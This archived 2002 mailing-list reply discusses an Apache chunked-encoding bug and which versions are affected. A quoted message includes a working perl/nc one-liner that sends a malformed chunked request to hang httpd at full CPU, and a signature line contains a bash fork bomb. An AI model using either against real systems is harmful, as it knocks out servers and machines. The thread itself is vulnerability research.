Vulnerability Development mailing list archives
Re: Re: apache chunked encoding
From: "cc" <crystal () ccert edu cn>
Date: Thu, 20 Jun 2002 12:17:20 +0800
DEAR Edwin Groothuis: Apache/1.3.23 (Unix) (Red-Hat/Linux) in my box doesn't show this dehaviour kiven_chen ======= 2002-06-20 12:13:00 IN YOUR E-MAIL:=======
On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote:I was playing a bit with chunked encoding vulnerability and found the following. When I send a request to Apache 1.3.24 using malformed chunked encoding, httpd process goes into infinite loop and CPU load grows to 100. Example: perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80 62681 www 63 0 146M 5364K RUN 3:08 45.90 45.90 apache 42121 www 63 0 139M 2524K RUN 1:15 44.97 44.97 apache Can anyone try it with 1.3.26?Apache 1.3.26 doesn't show this behaviour (yes, I've tried it with 1.3.20 first) Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin () mavetju org | Interested in MUDs? Visit Fatal Dimensions: bash$ :(){ :|:&};: | http://www.FatalDimensions.org/
= = = = = = = = = = = = = = = = = = = =
Current thread:
- apache chunked encoding Przemyslaw Frasunek (Jun 19)
- Re: apache chunked encoding Edwin Groothuis (Jun 19)
- Re: apache chunked encoding David Bernick (Jun 20)
- <Possible follow-ups>
- Re: Re: apache chunked encoding cc (Jun 20)
- RE: apache chunked encoding Horner, Jonathan J. (JH8) (Jun 20)
- Re: apache chunked encoding David Bernick (Jun 20)
- Re: apache chunked encoding Tina Bird (Jun 20)
- Re: apache chunked encoding Marc Slemko (Jun 21)
- Re: apache chunked encoding Tina Bird (Jun 21)
- Re: apache chunked encoding David Bernick (Jun 20)